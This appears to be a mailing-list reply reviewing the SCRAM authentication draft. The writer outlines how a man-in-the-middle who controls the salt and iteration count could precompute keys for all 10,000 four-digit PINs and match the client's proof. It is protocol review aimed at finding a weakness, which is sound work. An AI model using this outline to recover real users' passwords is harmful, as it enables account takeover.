Dave Cridland wrote: > Have you got any figures on timescales for this, and computing power > required? I mean, is this something that anyone who hasn't upset the > NSA or GCHQ should be concerned about, or are we within reasonable > range of someone trying to phish credit card numbers?
http://tools.ietf.org/html/draft-newman-auth-scram-08 Section 7 The amount of time necessary for this attack depends on the cryptographic hash function selected, the strength of the password and the iteration count supplied by the server. Looking at how SCRAM works, an interation count of 1 and my stupid pin passwords (four digests) I'm sure every laptop today can hack it (there are only 10000 possible passwords). The iteration count is set by the server, so I'm not sure it adds additional security. The MITM will be server for one client, so I guess it is too easy. I'm no security expert, but: A ---- MITM ---- B A thinks it requests the channel-bindings with B but it does so with MITM. It sends a username to MITM and MITM chooses salt and iteration count. AuthMessage := client-first-message + "," + server-first-message + "," + final-client-message-without-proof ClientSignature := HMAC(StoredKey, AuthMessage) ClientProof := ClientKey XOR ClientSignature The MITM must calculate this for every possible StoredKey/ClientKey. Even with an iteration, it can calculate that in advance. It has a dictionary with 10000 entries (pin, StoredKey, ClientKey) and always using the same salt. Therefore the MITM needs to calculate: HMAC(StoredKey, AuthMessage) XOR ClientKey It shouldn't take long to do this 10000 times and compare the result with what the client send as ClientProof. If MITM is done with that, it knows the password to play A to B. Or did I miss something? Alexey, you are the expert here. Dirk -- A good programmer is someone who looks both ways before crossing a one-way street. - Doug Linder
